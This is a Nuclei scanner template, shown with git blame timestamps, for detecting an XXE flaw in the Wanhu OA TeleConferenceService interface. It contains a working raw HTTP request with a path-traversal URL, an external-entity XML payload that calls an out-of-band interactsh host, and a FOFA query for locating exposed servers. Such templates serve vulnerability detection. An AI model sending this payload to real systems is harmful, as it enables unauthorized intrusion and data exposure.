nuclei-templates/http/vulnerabilities/wanhu/wanhu-teleconferenceservice...

49 lines
1.6 KiB
YAML
Raw Normal View History

2023-09-18 12:37:42 +00:00
id: wanhu-teleconferenceservice-xxe
2023-09-08 11:25:00 +00:00
2023-08-18 03:22:06 +00:00
info:
2023-09-18 12:37:42 +00:00
name: Wanhu OA TeleConferenceService Interface - XML External Entity Injection
2023-08-18 03:22:06 +00:00
author: SleepingBag945
2023-09-08 11:25:00 +00:00
severity: high
description: |
There is an XXE injection vulnerability in the Wanhu OA TeleConferenceService interface. An attacker can use the vulnerability to continue XXE injection to obtain sensitive information on the server.
2023-08-18 03:22:06 +00:00
reference:
- http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html
2023-09-08 11:25:00 +00:00
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20TeleConferenceService%20XXE%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-09-08 11:25:00 +00:00
fofa-query: app="万户网络-ezOFFICE"
2023-08-18 03:22:06 +00:00
tags: wanhu,oa,xxe
http:
- raw:
- |
POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1
Host: {{Hostname}}
2023-09-08 11:25:00 +00:00
2023-08-18 03:22:06 +00:00
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
2023-09-17 16:11:07 +00:00
<!ENTITY xxe SYSTEM "http://{{interactsh-url}}" >]>
2023-08-18 03:22:06 +00:00
<value>&xxe;</value>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
2023-09-08 11:25:00 +00:00
- type: word
2023-09-18 12:37:42 +00:00
part: body
2023-09-08 11:25:00 +00:00
words:
2023-09-18 12:37:42 +00:00
- "<response>"
- "<retcode>"
condition: and
2023-09-08 11:25:00 +00:00
- type: word
2023-09-18 12:37:42 +00:00
part: header
2023-09-08 11:25:00 +00:00
words:
2023-10-14 11:27:55 +00:00
- "text/xml"
# digest: 4b0a00483046022100a136a03abb48fc04d314a73fb584964e8dc2bdc3f0d71815c2209085382cff72022100a1ef2bd0b22a5245cf9e08868f91afc38cc6d6c3386dff0ebae685d25a1d5acc:922c64590222798bb761d5b6d8e72950